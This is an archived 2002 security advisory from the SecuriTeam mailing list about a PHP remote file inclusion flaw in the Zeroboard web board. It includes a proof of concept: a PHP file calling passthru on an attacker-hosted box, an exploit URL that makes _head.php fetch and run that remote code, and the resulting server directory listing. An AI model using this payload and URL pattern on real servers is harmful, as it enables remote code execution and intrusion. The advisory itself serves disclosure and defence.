[UNIX] Zeroboard PHP Source Injection
From: support@securiteam.comDate: 06/15/02
- Previous message: support@securiteam.com: "[NEWS] Fore/Marconi ATM Switch 'land' Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 15 Jun 2002 21:37:10 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Zeroboard PHP Source Injection
------------------------------------------------------------------------
SUMMARY
<http://nzeo.com/> Zeroboard is one of the most popular PHP web boards in
Korea. A security vulnerability in the product allows remote attackers to
cause the product to include malicious code found outside the web site
into an existing PHP page (this would allow execution of malicious
arbitrary code).
DETAILS
If "allow_url_fopen" is set to "on" and the "register_globals" is also set
to "on" in php.ini, a security vulnerability in Zeroboard allows attackers
to include PHP code into the server's existing files. This is due to the
fact that "_head.php" does not properly check incoming user provided data.
Example:
Creating the following file:
--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------
And then accessing the following URL:
http://BOARD_URL/_head.php?_zb_path=http://MYBOX/
Will result in:
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php
apply_vote.php check_user_id.php comment_ok.php config.php data
del_comment.php del_comment_ok.php delete.php delete_ok.php download.php
error.php icon image_box.php images include index.html install.php
install1.php install2.php install2_ok.php install_ok.php latest_skin
lib.php license.txt list_all.php login.php login_check.php logout.php
lostid.php lostid_search.php member_join.php member_join_ok.php
member_memo.php member_memo2.php member_memo3.php member_modify.php
member_modify_ok.php member_out.php open_window.php outlogin.php
outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view.php view_info.php view_info2.php
view_preview.php vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in
/home/morris/public_html/tmp/bbs/_head.php on line 41
ADDITIONAL INFORMATION
The information has been provided by <mailto:morris@xsdeny.net> morris.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Fore/Marconi ATM Switch 'land' Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
